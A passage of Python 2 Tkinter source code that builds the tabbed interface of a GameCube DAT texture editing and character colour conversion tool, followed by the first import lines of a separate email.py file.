self.discDetailsTab.helpTextLabel.pack( expand=1, pady=0 )
self.discDetailsTab.row4.pack( expand=1, fill='both' )
self.discDetailsTab.row4.pack_propagate( False )
# Establish character length validation, and updates between GameID labels
def validateDiscDetailLen( stringVar, maxCharacters ):
enteredValue = stringVar.get()
if len( enteredValue ) > maxCharacters: stringVar.set( enteredValue[:maxCharacters] )
elif maxCharacters < 10: # i.e. the gameIdText
if stringVar == self.gameIdText:
consoleIdText.set( '' )
gameCodeText.set( '' )
regionCodeText.set( '' )
makerCodeText.set( '' )
if len(enteredValue) > 0: consoleIdText.set( enteredValue[0] )
if len(enteredValue) > 1: gameCodeText.set( enteredValue[1:3] )
if len(enteredValue) > 3: regionCodeText.set( enteredValue[3] )
if len(enteredValue) > 4: makerCodeText.set( enteredValue[4:7] )
self.gameIdText.trace( 'w', lambda nm, idx, mode, var=self.gameIdText: validateDiscDetailLen(var, 6) )
self.shortTitle.trace( 'w', lambda nm, idx, mode, var=self.shortTitle: validateDiscDetailLen(var, 32) )
self.shortMaker.trace( 'w', lambda nm, idx, mode, var=self.shortMaker: validateDiscDetailLen(var, 32) )
self.longTitle.trace( 'w', lambda nm, idx, mode, var=self.longTitle: validateDiscDetailLen(var, 64) )
self.longMaker.trace( 'w', lambda nm, idx, mode, var=self.longMaker: validateDiscDetailLen(var, 64) )
# Tab 3 | DAT Texture Tree tab
self.datTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.datTab, text=' DAT Texture Tree ' )
self.dnd.bindtarget( self.datTab, lambda event: dndHandler( event, 'datTab' ), 'text/uri-list' )
# DAT tab, row 1
datTabRow1 = ttk.Frame( self.datTab, padding="12 12 12 12" ) # Padding order: Left, Top, Right, Bottom.
ttk.Label( datTabRow1, text=" DAT / USD:" ).pack( side='left' )
self.datDestination = Tk.StringVar()
datDestinationLabel1 = ttk.Entry( datTabRow1, textvariable=self.datDestination )
datDestinationLabel1.pack( side='left', fill='x', expand=1, padx=12 )
datDestinationLabel1.bind( '<Return>', openDatDestination )
datTabRow1.pack( fill='x', side='top' )
# DAT tab, row 2 | Frame for the image tree and info pane
datTabRow2 = ttk.Frame( self.datTab, padding="12 0 12 12" ) # Contains the tree and the info pane. Padding order: Left, Top, Right, Bottom.
# File Tree start
datTreeScroller = Tk.Scrollbar( datTabRow2 )
self.datTextureTree = ttk.Treeview( datTabRow2, columns=('texture', 'dimensions', 'type'), yscrollcommand=datTreeScroller.set )
self.datTextureTree.heading('#0', anchor='center', text='Preview')
self.datTextureTree.column('#0', anchor='center', minwidth=104, stretch=0, width=104) # "#0" is implicit in columns definition above.
self.datTextureTree.heading('texture', anchor='center', text='Offset (len)', command=lambda: treeview_sort_column( self.datTextureTree, 'texture', False ))
self.datTextureTree.column('texture', anchor='center', minwidth=80, stretch=0, width=100)
self.datTextureTree.heading('dimensions', anchor='center', text='Dimensions', command=lambda: treeview_sort_column( self.datTextureTree, 'dimensions', False ))
self.datTextureTree.column('dimensions', anchor='center', minwidth=80, stretch=0, width=100)
self.datTextureTree.heading('type', anchor='center', text='Texture Type', command=lambda: treeview_sort_column( self.datTextureTree, 'type', False ))
self.datTextureTree.column('type', anchor='center', minwidth=75, stretch=0, width=100)
self.datTextureTree.pack( fill='both', side='left' )
datTreeScroller.config( command=self.datTextureTree.yview )
datTreeScroller.pack( side='left', fill='y' )
self.datTextureTree.lastLoaded = None # Used by the 'Prev./Next' file loading buttons on the DAT Texture Tree tab
self.datTextureTree.bind( '<<TreeviewSelect>>', onTextureTreeSelect )
self.datTextureTree.bind( "<3>", createTextureTreeContextMenu ) # Summons the right-click context menu.
# Create repositories to store image data (these are used to prevent garbage collected)
self.datTextureTree.fullTextureRenders = {}
self.datTextureTree.textureThumbnails = {}
# Background widgets
self.datTextureTreeBg = Tk.Label( self.datTextureTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.datTextureTreeBg.place(relx=0.5, rely=0.5, anchor='center')
self.datTextureTreeFiltersMsg = ttk.Label( self.datTextureTree, text='Either no textures were found, or you have them filtered out.', background='white' )
# Item highlighting. The order of the configs below reflects (but does not dictate) the priority of their application
self.datTextureTree.tag_configure( 'warn', background='#f6c6d7' ) # light red
self.datTextureTree.tag_configure( 'mipmap', background='#d7e1ff' ) # light blue; same as SA tab 'marked' items
# File Tree end
defaultCanvasDimensions = 258 # Default size for the height and width of the texture viewing canvas. 256 + 1px border
self.imageManipTabs = ttk.Notebook(datTabRow2)#, width=330
self.textureTreeImagePane = Tk.Frame(self.imageManipTabs)
self.imageManipTabs.add( self.textureTreeImagePane, text=' Image ', sticky='nsew' )
canvasOptionsPane = ttk.Frame(self.textureTreeImagePane, padding='0 15 0 0')
ttk.Checkbutton( canvasOptionsPane, command=self.updateCanvasGrid, text='Show Grid', variable=generalBoolSettings['showCanvasGrid'] ).pack(side='left', padx=7)
ttk.Checkbutton( canvasOptionsPane, command=updateCanvasTextureBoundary, text='Show Texture Boundary', variable=generalBoolSettings['showTextureBoundary'] ).pack(side='left', padx=7)
canvasOptionsPane.pack()
self.textureDisplayFrame = Tk.Frame(self.textureTreeImagePane) # The border and highlightthickness for the canvas below must be set to 0, so that the canvas has a proper origin of (0, 0).
self.textureDisplay = Tk.Canvas(self.textureDisplayFrame, width=defaultCanvasDimensions, height=defaultCanvasDimensions, borderwidth=0, highlightthickness=0) #, background='blue'
# alternate dynamic imaging technique: http://stackoverflow.com/questions/3482081/tkinter-label-widget-with-image-update
self.textureDisplay.pack( expand=1 ) # fill='both', padx=10, pady=10
self.updateCanvasGrid()
self.textureDisplay.defaultDimensions = defaultCanvasDimensions
self.textureDisplayFrame.pack( expand=1 )
datPreviewPaneBottomRow = Tk.Frame(self.textureTreeImagePane) # This object uses grid alignment for its children so that they're centered and equally spaced amongst each other.
self.previousDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('previousDatButton') )
self.previousDatButton.grid( column=0, row=0, ipadx=5, pady=(10, 0), sticky='e' )
self.previousDatText = Tk.StringVar()
ToolTip( self.previousDatButton, textvariable=self.previousDatText, delay=300, location='n' )
datFileDetails = ttk.Labelframe( datPreviewPaneBottomRow, text=' File Details ', labelanchor='n' )
self.datFilesizeText = Tk.StringVar()
self.datFilesizeText.set('File Size: ')
ttk.Label(datFileDetails, textvariable=self.datFilesizeText, width=23)
self.totalTextureSpaceText = Tk.StringVar()
self.totalTextureSpaceText.set('Total Texture Size: ')
ttk.Label(datFileDetails, textvariable=self.totalTextureSpaceText)
self.texturesFoundText = Tk.StringVar()
self.texturesFoundText.set('Textures Found: ')
ttk.Label(datFileDetails, textvariable=self.texturesFoundText)
self.texturesFilteredText = Tk.StringVar()
self.texturesFilteredText.set('Filtered Out: ')
ttk.Label(datFileDetails, textvariable=self.texturesFilteredText)
for widget in datFileDetails.winfo_children():
widget.pack( padx=20, pady=0, anchor='w' )
datFileDetails.grid( column=1, row=0 )
self.nextDatButton = ttk.Label( datPreviewPaneBottomRow, image=self.imageBank('nextDatButton') )
self.nextDatButton.grid( column=2, row=0, ipadx=5, pady=(10, 0), sticky='w' )
self.nextDatText = Tk.StringVar()
ToolTip( self.nextDatButton, textvariable=self.nextDatText, delay=300, location='n' )
datPreviewPaneBottomRow.columnconfigure(0, weight=1)
datPreviewPaneBottomRow.columnconfigure(1, weight=1)
datPreviewPaneBottomRow.columnconfigure(2, weight=1)
datPreviewPaneBottomRow.rowconfigure(0, weight=1)
datPreviewPaneBottomRow.pack(side='bottom', pady=7, fill='x')
# Palette tab
self.palettePane = ttk.Frame( self.imageManipTabs, padding='16 0 0 0' )
self.imageManipTabs.add( self.palettePane, text=' Palette ', state='disabled' )
self.imageManipTabs.bind( '<<NotebookTabChanged>>', self.imageManipTabChanged )
# Left-side column (canvas and bg color changer button)
paletteTabLeftSide = Tk.Frame(self.palettePane)
self.paletteCanvas = Tk.Canvas( paletteTabLeftSide, borderwidth=3, relief='ridge', background='white', width=187, height=405 ) #old height:373
paletteBgColorChanger = ttk.Label( paletteTabLeftSide, text='Change Background Color', foreground='#00F', cursor='hand2' )
self.paletteCanvas.paletteEntries = []
self.paletteCanvas.itemColors = {}
paletteBgColorChanger.bind( '<1>', togglePaletteCanvasColor )
self.paletteCanvas.pack( pady=11, padx=0 )
self.paletteCanvas.entryBorderColor = '#3399ff' # This is the same blue as used for treeview selection highlighting
paletteBgColorChanger.pack()
paletteTabLeftSide.grid( column=0, row=0 )
# Right-side column (palette info)
paletteDetailsFrame = Tk.Frame(self.palettePane)
self.paletteDataText = Tk.StringVar( value='Data Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteDataText ).pack(pady=3)
self.paletteHeaderText = Tk.StringVar( value='Header Offset:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteHeaderText ).pack(pady=3)
self.paletteTypeText = Tk.StringVar( value='Palette Type:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteTypeText ).pack(pady=3)
self.paletteMaxColorsText = Tk.StringVar( value='Max Colors:')
ttk.Label( paletteDetailsFrame, textvariable=self.paletteMaxColorsText ).pack(pady=3)
self.paletteStatedColorsText = Tk.StringVar( value='Stated Colors:' )
ttk.Label( paletteDetailsFrame, textvariable=self.paletteStatedColorsText ).pack(pady=3)
#self.paletteActualColorsText = Tk.StringVar( value='Actual Colors:' ) # todo:reinstate?
#ttk.Label( paletteDetailsFrame, textvariable=self.paletteActualColorsText ).pack(pady=3)
paletteDetailsFrame.grid( column=1, row=0, pady=60, sticky='n' )
self.palettePane.columnconfigure( 0, weight=1 )
self.palettePane.columnconfigure( 1, weight=2 )
# Add a help button to explain the above
helpText = ( 'Max Colors is the maximum number of colors this texture has space for with its current texture format.\n\n'
'Stated Colors is the number of colors that the palette claims are actually used by the texture (described by the palette data header).\n\n'
'The number of colors actually used may still differ from both of these numbers, especially for very old texture hacks.' )
helpBtn = ttk.Label( self.palettePane, text='?', foreground='#445', cursor='hand2' )
helpBtn.place( relx=1, x=-17, y=18 )
helpBtn.bind( '<1>', lambda e, message=helpText: msg(message, 'Palette Properties') )
# Model parts tab
self.modelPropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.imageManipTabs.add( self.modelPropertiesPane, text='Model', state='disabled' )
self.modelPropertiesPane.interior.imageDataHeaders = []
self.modelPropertiesPane.interior.nonImageDataHeaders = [] # Not expected
self.modelPropertiesPane.interior.textureStructs = [] # Direct model attachments
self.modelPropertiesPane.interior.headerArrayStructs = [] # Used for animations
self.modelPropertiesPane.interior.unexpectedStructs = []
self.modelPropertiesPane.interior.materialStructs = []
self.modelPropertiesPane.interior.displayObjects = []
self.modelPropertiesPane.interior.hideJointChkBtn = None
self.modelPropertiesPane.interior.polyDisableChkBtn = None
self.modelPropertiesPane.interior.opacityEntry = None
self.modelPropertiesPane.interior.opacityBtn = None
self.modelPropertiesPane.interior.opacityScale = None
# Texture properties tab
self.texturePropertiesPane = VerticalScrolledFrame( self.imageManipTabs )
self.texturePropertiesPane.flagWidgets = [] # Useful for the Flag Decoder to more easily find widgets that need updating
self.imageManipTabs.add( self.texturePropertiesPane, text='Properties', state='disabled' )
self.imageManipTabs.pack( fill='both', expand=1 )
datTabRow2.pack(fill='both', expand=1)
# End of DAT tab row 2, the image tree and info pane.
# Tab 4 | Structural Analysis
self.savTab = ttk.Frame( self.mainTabFrame ) # SAV = Structural Analysis View
self.mainTabFrame.add( self.savTab, text=' Structural Analysis ' )
self.dnd.bindtarget( self.savTab, lambda event: dndHandler( event, 'savTab' ), 'text/uri-list' )
# Create the treeview on the left where structures will be browsed
yScroller = Tk.Scrollbar( self.savTab )
xScroller = Tk.Scrollbar( self.savTab, orient='horizontal' )
self.fileStructureTree = ttk.Treeview( self.savTab, columns='offset', yscrollcommand=yScroller.set, xscrollcommand=xScroller.set, selectmode='extended' )
self.fileStructureTree.heading( '#0', anchor='center' ) # , command=function
self.fileStructureTree.column( '#0', anchor='center', minwidth=200, stretch=True, width=180 ) # "#0" is implicit in the columns definition above.
self.fileStructureTree.heading( 'offset', anchor='center', text='Offset' )
self.fileStructureTree.column( 'offset', anchor='e', minwidth=60, stretch=False, width=76 )
self.fileStructureTree.grid( column=0, row=0, sticky="nsew" )
self.fileStructureTree.tag_configure( 'marked', background='#d7e1ff' ) # light blue; same as mipmap highlight color
# Configure and attach the scrollbars
yScroller.config( command=self.fileStructureTree.yview )
xScroller.config( command=self.fileStructureTree.xview )
yScroller.grid( column=1, row=0, sticky="nsew" )
xScroller.grid( column=0, row=1, columnspan=2, sticky="nsew" )
self.fileStructureTree.yScroller = yScroller
self.fileStructureTree.xScroller = xScroller
# Add treeview event handlers
self.fileStructureTree.bind( '<<TreeviewSelect>>', onStructureTreeSelect )
self.fileStructureTree.bind( '<<TreeviewOpen>>', growStructuralAnalysisTree ) # Occurs when expanding items with children
#self.fileStructureTree.bind( '<Double-1>', onStructureTreeDoubleClick ) # todo: find workaround. some kind of conflict prevents this from working
self.fileStructureTree.bind( "<3>", createStructureTreeContextMenu ) # Right-click
# Create the frame on the right where structure properties will be populated
self.structurePropertiesFrame = VerticalScrolledFrame( self.savTab, width=378 )
self.structurePropertiesFrame.grid( column=2, row=0, sticky="nsew" )
# Configure sizing/resizing behavior of the grid cells
self.savTab.grid_columnconfigure( 0, weight=5 )
self.savTab.grid_columnconfigure( 1, weight=0 )
self.savTab.grid_columnconfigure( 2, weight=1, minsize=378 )
self.savTab.grid_rowconfigure( 0, weight=1 )
# Place the DnD background texture
self.fileStructureTreeBg = Tk.Label( self.fileStructureTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.fileStructureTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
self.fileStructureTree.allIids = []
# Place the search button (and its hover cursor & text)
self.fileStructureTree.searchBtn = Tk.Label( self.fileStructureTree, image=self.imageBank('searchIcon'), bg='white', borderwidth=0, highlightthickness=0 )
self.fileStructureTree.searchBtn.place( rely=1, x=3, y=-6, anchor='sw' )
self.fileStructureTree.searchBtn.bind( '<1>', lambda event: structSearchWindow() )
self.fileStructureTree.searchBtn.config( cursor='hand2' )
ToolTip( self.fileStructureTree.searchBtn, text='Structure Search (CTRL-F)', delay=500 )
self.structPropFrameWrapLength = 300 # The Label wrap length for text inside the structurePropertiesFrame.
# Tab 5 | Manual Texture Replacement
self.mtrTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.mtrTab, text=' Manual Placement ' )
self.dnd.bindtarget( self.mtrTab, lambda event: dndHandler( event, 'mtrTab' ), 'text/uri-list' )
# MTR tab, row 1
mtrTabRow1 = ttk.Frame( self.mtrTab, padding="12 12 12 0" ) # Left, Top, Right, Bottom
ttk.Label( mtrTabRow1, text=" DAT / USD:" ).pack( side='left' )
datDestinationLabel2 = ttk.Entry( mtrTabRow1, textvariable=self.datDestination ) #, font='TkTextFont'
datDestinationLabel2.pack( side='left', fill='x', expand=1, padx=12 )
mtrTabRow1.pack(fill='x', side='top')
# MTR tab, row 2 | Directions
ttk.Label( self.mtrTab, text="This tab gives you the freedom to write a texture into any exact location."
"\nThat even includes any textures that don't normally appear in the DAT Texture Tree."
"\nYou can riffle through the 'Program Usage.txt' file for information on how to use this." ).pack(pady=9)
# MTR tab, row 3 | Texture input
self.mtrTabRow2 = ttk.Frame(self.mtrTab, padding="12 6 0 0") # Left, Top, Right, Bottom
self.sourceTexturesText = Tk.StringVar()
self.sourceTexturesText.set("Texture(s):\n (0 total)")
ttk.Label(self.mtrTabRow2, textvariable=self.sourceTexturesText).pack(side='left') #.grid(column=1, row=1, sticky='ne')
self.imageTextArea = ScrolledText(self.mtrTabRow2, width=74, height=14, wrap='word', font='TkTextFont')
self.imageTextArea.pack(side='left', fill='x', expand=1, padx=12)
self.imageTextArea.bind('<KeyRelease>', onTextAreaKeyUp)
arrowFont = tkFont.Font(family='Courier', size='8', weight='bold')
##self.imageTextArea.tag_config('offsetArrow', foreground='#0066FF', font=arrowFont)
self.imageTextArea.tag_config('offsetArrow', foreground='#119922', font=arrowFont)
self.imageTextArea.tag_config('successfulOverwrite', background='#99FF99', font='TkTextFont')
self.imageTextArea.tag_config('warningOverwrite', background='#FFFF99', font='TkTextFont')
self.imageTextArea.tag_config('failedOverwrite', background='#FF9999', font='TkTextFont')
mtrBtnFrame = ttk.Frame(self.mtrTabRow2, padding=12)
ttk.Button(mtrBtnFrame, text=" Select Textures ", command=importImageFiles).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Scan folder \n structure", command=scanFolderStructure).pack(pady=3)
ttk.Button(mtrBtnFrame, text=" Clear Highlighting ", command=clearHighlighting).pack(pady=3)
ttk.Separator(mtrBtnFrame, orient='horizontal').pack(fill='x', padx=6, pady=7)
ttk.Button(mtrBtnFrame, text="Write textures into DAT", command=overwriteImagesManually, width=23).pack(pady=3)
self.mtrSaveBackup = Tk.BooleanVar()
self.mtrSaveBackup.set(1)
ttk.Checkbutton( mtrBtnFrame, text=' Keep a backup of \n the original DAT', variable=self.mtrSaveBackup ).pack()
mtrBtnFrame.pack(side='right')
self.mtrTabRow2.pack(fill='x', anchor='n')
battleFrame = Tk.Frame( self.mtrTab )
ttk.Label( battleFrame, image=self.imageBank('cathedralBattle') ).place( relx=0.5, rely=0.5, anchor='center' )
battleFrame.pack( fill='both', expand=1 )
# Tab 6 | Character Color Converter (CCC)
self.cccTab = ttk.Frame(self.mainTabFrame)
self.mainTabFrame.add(self.cccTab, text=' CCC ')
ttk.Label(self.cccTab, text=' Character Color Converter ', font="-weight bold").pack(pady=23)
cccFileSelectionRow = Tk.Frame(self.cccTab)
ttk.Label(cccFileSelectionRow, text="Step 1 | Choose the source file you'd like to convert." \
"\n\n(If you're on the Disc File Tree, you can right-click \non the file and select 'Set as CCC Source File'.)", wraplength=350).grid(column=0, row=0, padx=15, pady=25)
cccTabRow2RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button(cccTabRow2RightCell, text=' Within a Disc ', command=cccPointToDiscTab).grid(column=0, row=0)
ttk.Button(cccTabRow2RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('source')).grid(column=1, row=0)
self.cccSourceCanvas = Tk.Canvas(cccTabRow2RightCell, width=290, height=64, borderwidth=0, highlightthickness=0)
self.cccIdentifiersXPos = 90
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ')
self.cccSourceCanvas.create_text( self.cccIdentifiersXPos, 44, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Costume Color: ')
self.cccSourceCanvas.insigniaImage = None
self.cccSourceCanvas.grid(column=0, row=1, columnspan=2, pady=7)
cccTabRow2RightCell.grid(column=1, row=0)
ttk.Label(cccFileSelectionRow, text='Step 2 | Choose a "destination" file of the desired color (and same character). This file will have its texture data replaced with the textures ' \
"from the file above.\nSo make sure you have a back-up of this if you'd like to use it again later.", wraplength=350).grid(column=0, row=1, padx=15, pady=25)
cccTabRow4RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button( cccTabRow4RightCell, text=' Within a Disc ', command=cccPointToDiscTab ).grid( column=0, row=0 )
ttk.Button( cccTabRow4RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('dest') ).grid( column=1, row=0 )
self.cccDestCanvas = Tk.Canvas( cccTabRow4RightCell, width=290, height=64, borderwidth=0, highlightthickness=0 ) #, background='blue'
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ' )
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, 44, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Costume Color: ' )
self.cccDestCanvas.insigniaImage = None
self.cccDestCanvas.grid( column=0, row=1, columnspan=2, pady=7 )
cccTabRow4RightCell.grid( column=1, row=1 )
cccFileSelectionRow.pack( pady=0 )
finalButtonsFrame = Tk.Frame( self.cccTab )
ttk.Button( finalButtonsFrame, text=' Step 3 | Convert! ', command=convertCharacterColor ).pack( side='left', padx=25 )
self.cccOpenConvertedFileButton = ttk.Button( finalButtonsFrame, text=' Open Converted File ', command=openConvertedCharacterFile, state='disabled' )
self.cccOpenConvertedFileButton.pack( side='left', padx=25 )
finalButtonsFrame.pack( pady=12 )
cccBannerFrame = Tk.Frame(self.cccTab)
ttk.Label( cccBannerFrame, image=self.imageBank('cccBanner') ).place(relx=0.5, rely=0.5, anchor='center')
cccBannerFrame.pack( fill='both', expand=1 )
# Set up the Drag-n-drop event handlers.
for widget in cccFileSelectionRow.grid_slaves(row=0): self.dnd.bindtarget(widget, lambda event: dndHandler( event, 'cccTabSource' ), 'text/uri-list')
for widget in cccFileSelectionRow.grid_slaves(row=1): self.dnd.bindtarget(widget, lambda event: dndHandler( event, 'cccTabDest' ), 'text/uri-list')
# Tab 5 | Character Select Screen (CSS)
# cssTab = ttk.Frame(self.mainTabFrame)
# self.mainTabFrame.add(cssTab, text=' CSS ')
# cssEmulator = Tk.Canvas(cssTab, width=320, height=240, borderwidth=0, highlightthickness=0, bg='blue')
# cssEmulator.pack()
# Tab 6 | Texture Search
# searchTab = ttk.Frame( self.mainTabFrame )
# self.mainTabFrame.add( searchTab, text=' Search ' )
self.mainTabFrame.pack( fill='both', expand=1 )
self.mainTabFrame.bind( '<<NotebookTabChanged>>', self.onMainTabChanged )
self.programStatus = Tk.StringVar()
self.programStatus.set( '' ) # for testing position -> | xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |
self.programStatusLabel = Tk.Label( self.root, textvariable=self.programStatus, fg='#000000', anchor='center' )
self.programStatusLabel.place( x=708, anchor='n' )
# End of tabbed interface area
# GUI Rendering complete. Initialize program.
self.root.deiconify() # GUI has been minimized until rendering was complete. This brings it to the foreground
# Bind keyboard shortcuts and the scroll handler
self.root.bind( "<Control-f>", self.searchHandler )
self.root.bind( "<Control-F>", self.searchHandler )
self.root.bind( '<Control-r>', lambda event: runInEmulator() )
self.root.bind( '<Control-R>', lambda event: runInEmulator() )
self.root.bind( '<Control-s>', lambda event: saveChanges() )
self.root.bind( '<Control-S>', lambda event: saveChanges() )
self.root.bind_class( "Text", "<Control-a>", selectAll )
self.root.bind_class( "TEntry", "<Control-a>", selectAll )
# Set up the scroll handler. Unbinding native scroll functionality on some classes to prevent problems when scrolling on top of other widgets
self.root.unbind_class( 'Text', '<MouseWheel>' ) # Allows onMouseWheelScroll below to handle this
self.root.unbind_class( 'Treeview', '<MouseWheel>' ) # Allows onMouseWheelScroll below to handle this
self.root.bind_all( "<MouseWheel>", onMouseWheelScroll )
# The following 4 lines set up an update methodology for updating tkinter GUI elements that's triggered from other processes
self.textureUpdateQueue = None
self.processRenderingPool = None
#self.root.bind( '<<message>>', self.updateTextureThumbnail )
self.thumbnailUpdateJob = None
self.thumbnailUpdateInterval = 300
# The following is used to tell various aspects of the program that it's closing. todo: perhaps better to use this instead of the global variable
#self.shutdownEvent = multiprocessing.Event() # Use multiprocessing.Manager().Queue to reach into separate processes
def searchHandler( self, event ):
# Check the currently selected tab to determine what to do with CTRL-F presses
currentTab = self.root.nametowidget( self.mainTabFrame.select() )
if currentTab == self.savTab: structSearchWindow()
def imageBank( self, imageName ):
""" Loads and stores images required by the GUI. This allows all of the images to be
stored together in a similar manner, and ensures references to all of the loaded
images are stored, which prevents them from being garbage collected (which would
otherwise cause them to disappear from the GUI after rendering is complete). The
images are only loaded when first requested, and then kept for future reference. """
image = self._imageBank.get( imageName, None )
if not image: # Hasn't yet been loaded
imagePath = imagesFolder + "\\" + imageName + ".png"
try:
image = self._imageBank[imageName] = ImageTk.PhotoImage( Image.open( imagePath ) )
except:
msg( 'Unable to load the image, "' + imagePath + '".' )
return image
def updateMainMenuOptions( self, event ):
""" This method is used as an efficiency improvement over using the Menu postcommand argument.
Normally, all postcommand callbacks for all submenus that have one are called when the
user clicks to expand any one submenu, or even if they only click on the menubar itself,
when no submenu even needs to be displayed. So this method works to call the callback
of only one specific submenu when it needs to be displayed. Details here:
https://stackoverflow.com/questions/55753828/how-can-i-execute-different-callbacks-for-different-tkinter-sub-menus
Note that event.widget is a tk/tcl path string in this case, rather than a widget instance. """
activeMenuIndex = self.root.call( event.widget, "index", "active" )
if isinstance( activeMenuIndex, int ):
activeMenu = self.menubar.winfo_children()[activeMenuIndex]
# Check if this menu has a repopulate method (in which case it will also have an open attribute), and call it if the menu is open
if getattr( activeMenu, 'repopulate', None ) and not activeMenu.open:
# Repopulate the menu's contents
activeMenu.repopulate()
activeMenu.open = True
else: # The active menu index is 'none'; all menus are closed, so reset the open state for all of them
for menuWidget in self.menubar.winfo_children():
menuWidget.open = False
def updateCanvasGrid( self, saveChange=True ):
""" Shows/hides the grid behind textures displayed in the DAT Texture Tree's 'Image' tab. """
if generalBoolSettings['showCanvasGrid'].get():
self.textureDisplayFrame.config( highlightbackground='#c0c0c0', highlightcolor='#c0c0c0', highlightthickness=1, borderwidth=0, relief='flat' )
canvasWidth = int( self.textureDisplay['width'] )
canvasHeight = int( self.textureDisplay['height'] )
gridImage = self.imageBank( 'canvasGrid' )
# Tile the image across the canvas
for y in xrange(0, canvasHeight + 20, 20): # start, stop, step
for x in xrange(0, canvasWidth + 20, 20):
self.textureDisplay.create_image( x, y, image=gridImage, tags='grid' )
# Make sure any texture present stays above the grid
if len( self.textureDisplay.find_withtag('texture') ) != 0:
self.textureDisplay.tag_lower('grid', 'texture')
else:
# Remove the grid
for item in self.textureDisplay.find_withtag('grid'):
self.textureDisplay.delete( item )
self.textureDisplayFrame.config(highlightbackground='#c0c0c0', highlightcolor='#c0c0c0', highlightthickness=0, borderwidth=0, relief='flat')
if saveChange: # Update the current selection in the settings file.
with open( settingsFile, 'w') as theSettingsFile:
settings.set( 'General Settings', 'showCanvasGrid', str(generalBoolSettings['showCanvasGrid'].get()) )
settings.write( theSettingsFile )
def updateTextureThumbnail( self ):
""" Only used when multiprocess texture decoding is enabled.
Updates thumbnail images on the DAT Texture Tree tab once their rendering jobs are completed.
Rendering is done in separate processes to improve performance, however, GUI updates must all
be handled by this same thread. The full image data and its thumbnail must be stored (not
simply attached to the treeview item) to prevent being garbage-collected. """
textureUnavailableImage = self.imageBank( 'noImage' )
currentSelection = Gui.datTextureTree.selection()
global scanningDat, stopAndScanNewDat
while not self.textureUpdateQueue.empty():
textureImage, imageDataOffset = self.textureUpdateQueue.get( block=False )
if rescanPending(): break
elif imageDataOffset == -1 and not stopAndScanNewDat: # Indicates that there are no more textures. Can end the update loop for now
self.thumbnailUpdateJob = None
scanningDat = False
updateProgramStatus( 'File Scan Complete' )
#updateGuiOnRenderCompletion() <- This'll be cleaner if I end up needing more here
else:
if textureImage:
# Store the full texture image, and create a 64x64 thumbnail for it
try:
self.datTextureTree.fullTextureRenders[imageDataOffset] = ImageTk.PhotoImage( textureImage )
textureImage.thumbnail( (64, 64), Image.ANTIALIAS )
self.datTextureTree.textureThumbnails[imageDataOffset] = ImageTk.PhotoImage( textureImage )
except: # Problem creating a thumbnail
self.datTextureTree.fullTextureRenders[imageDataOffset] = textureUnavailableImage
self.datTextureTree.textureThumbnails[imageDataOffset] = textureUnavailableImage
print 'Unable to create a thumbnail image for', uHex( 0x20+imageDataOffset )
else: # Problem during decoding
self.datTextureTree.fullTextureRenders[imageDataOffset] = textureUnavailableImage
self.datTextureTree.textureThumbnails[imageDataOffset] = textureUnavailableImage
# Replace the 'loading...' image in the GUI with the new thumbnail image
iid = str( imageDataOffset )
if self.thumbnailUpdateJob and self.datTextureTree.exists( iid ): # Make sure the update loop is still running too
self.datTextureTree.item( iid, image=self.datTextureTree.textureThumbnails[imageDataOffset] )
# If the texture being updated is supposed to be displayed in the main display area, update that too
if currentSelection and currentSelection[-1] == iid: # Only the last item selected is usually displayed
drawTextureToMainDisplay( iid )
# Continue the GUI thumbnail update loop by re-queuing this method
if self.thumbnailUpdateJob:
self.thumbnailUpdateJob = self.root.after( self.thumbnailUpdateInterval, self.updateTextureThumbnail )
def onMainTabChanged( self, event ):
""" This function adjusts the height of rows in the treeview widgets, since the two treeviews can't be individually configured.
It also starts DAT file structural analysis or image searching when switching to the SA tab or DAT File Tree tab if a DAT file is loaded.
If an attempt is made to switch to a tab that is already the current tab, this function will not be called. """
global globalDatFile
currentTab = self.root.nametowidget( self.mainTabFrame.select() )
currentTab.focus() # Don't want keyboard/widget focus at any particular place yet
if currentTab == self.datTab:
ttk.Style().configure( 'Treeview', rowheight=76 )
if globalDatFile and not self.datTextureTree.get_children():
# May not have been scanned for textures yet (or none were found).
scanDat()
else:
ttk.Style().configure( 'Treeview', rowheight=20 )
if globalDatFile and currentTab == self.savTab and not self.fileStructureTree.get_children():
# SAV tab hasn't been populated yet. Perform analysis.
analyzeDatStructure()
def imageManipTabChanged( self, event ):
""" Called when the tabs within the DAT Texture Tree tab ('Image', 'Palette', etc.) are changed.
Main purpose is simply to prevent the first widget from gaining immediate focus. """
currentTab = self.root.nametowidget( event.widget.select() )
currentTab.focus() # Don't want keyboard/widget focus at any particular place yet
# Function & class definitions complete
if __name__ == '__main__':
#multiprocessing.freeze_support() # Needed in order to compile the program with multiprocessor support
# Initialize the GUI
Gui = MainGui()
#Gui.textureUpdateQueue = multiprocessing.Manager().Queue() # Needs to be enabled if multiprocessor texture decoding is enabled
# Process any files drag-and-dropped onto the program's .exe file.
if len( programArgs ) > 1:
# Filter out texture files.
Gui.root.update()
filepaths = [filepath for filepath in programArgs if not filepath.lower().endswith('.png') and not filepath.lower().endswith('.tpl')]
fileHandler( filepaths[1:] ) # First item is the main program script or executable (.py/.exe)
# Start the GUI's mainloop (blocks until the GUI is taken down by .destroy or .quit)
Gui.root.mainloop() |
email.py | from threading import Thread
from flask import current_app, render_template
